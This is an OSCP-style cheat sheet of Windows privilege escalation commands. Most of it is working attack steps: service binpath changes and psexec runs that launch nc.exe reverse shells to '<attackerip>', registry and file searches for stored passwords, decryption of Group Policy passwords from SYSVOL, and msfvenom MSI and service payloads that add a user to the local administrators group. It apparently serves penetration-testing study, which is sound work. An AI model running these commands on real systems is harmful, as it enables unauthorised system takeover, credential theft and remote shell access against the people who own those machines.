OSCP
Search…
Windows Priv Escalation
https://github.com/wwong99/windows-privilege-escalation
1
Windows
2
3
Enumeration
4
5
# basics
6
systeminfo
7
hostname
8
echo %username%
9
10
# users
11
net users
12
net user <username>
13
14
# network
15
ipconfig /all
16
route print
17
arp -A
18
netstat -ano # active network connections
19
20
# firewall status
21
netsh firewall show state
22
netsh firewall show config
23
netsh advfirewall firewall show rule all
24
25
# systeminfo output save in a file, check for vulnerabilities
26
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
27
python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt
28
29
# Search patches for given patch
30
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
31
32
--------------------------------------
33
Kernel
34
systeminfo
35
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
36
37
# check for possible exploits, find a place to upload (eg: C:\Inetpub or C:\temp) it, run exe
38
39
--------------------------------------
40
Weak permissions
41
# this example is for XP SP0
42
# upload accesschk.exe to a writable directory first
43
# for XP version 5.2 of accesschk.exe is needed
44
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
45
46
# check for serices with weak permissions
47
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
48
# check for the found services above
49
accesschk.exe -ucqv upnphost
50
# upload nc.exe to writable directory
51
sc config upnphost binpath= "C:\Inetpub\nc.exe -nv <attackerip> 9988 -e C:\WINDOWS\System32\cmd.exe"
52
sc config upnphost obj= ".\LocalSystem" password= ""
53
# check the status now
54
sc qc upnphost
55
# change start option as AUTO-START
56
sc config SSDPSRV start= auto
57
#start the services
58
net start SSDPSRV
59
net stop upnphost
60
net start upnphost
61
62
# listen on port 9988 and you'll get a shell with NT AUTHORITY\SYSTEM privileges
63
64
--------------------------------------
65
66
Registry Checks for Passwords
67
reg query HKLM /f password /t REG_SZ /s
68
reg query HKCU /f password /t REG_SZ /s
69
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
70
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
71
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
72
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
73
74
--------------------------------------
75
Places to Check for Credentials
76
77
C:\sysprep.inf
78
C:\sysprep\sysprep.xml
79
%WINDIR%\Panther\Unattend\Unattended.xml
80
%WINDIR%\Panther\Unattended.xml
81
82
dir /b /s unattend.xml
83
dir /b /s web.config
84
dir /b /s sysprep.inf
85
dir /b /s sysprep.xml
86
dir /b /s *pass*
87
dir /b /s vnc.ini
88
89
----------------------------
90
Groups.xml
91
# Look up ip-addres of DC
92
nslookup nameofserver.whatever.local
93
94
# It will output something like this
95
Address: 192.168.1.101
96
97
# Now we mount it
98
net use z: \\192.168.1.101\SYSVOL
99
100
# And enter it
101
z:
102
103
# Now we search for the groups.xml file
104
dir Groups.xml /s
105
106
# decrypt the password in it
107
gpp-decrypt <pass>
108
109
-----------------------------
110
111
AlwaysInstallElevated
112
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
113
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
114
# From the output, notice that “AlwaysInstallElevated” value is 1.
115
116
# Exploitation:
117
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
118
Place 'setup.msi' in 'C:\Temp'
119
msiexec /quiet /qn /i C:\Temp\setup.msi
120
net localgroup Administrators
121
122
---------------------------------
123
Find writable files
124
125
126
dir /a-r-d /s /b
127
/a is to search for attributes. In this case r is read only and d is directory. (look for writable files only)
128
/s means recurse subdirectories
129
/b means bare format. Path and filename only.
130
131
-----------------------------------
132
Unquoted Path
133
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
134
# Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
135
# check for permissions of folder path
136
icacls "C:\Program Files (x86)\Program Folder"
137
138
# exploit
139
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
140
Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
141
#Open command prompt and type:
142
sc start unquotedsrvc
143
net localgroup Administrators
144
145
-----------------------------------
146
# psexec using found credentials
147
# first upload nc.exe to a writable directory
148
psexec.exe -u <username> -p <password> \\MACHINENAME C:\Inetpub\nc.exe <attackerip> <attackerport> -e C:\windows\system32\cmd.exe
Copied!
Copy link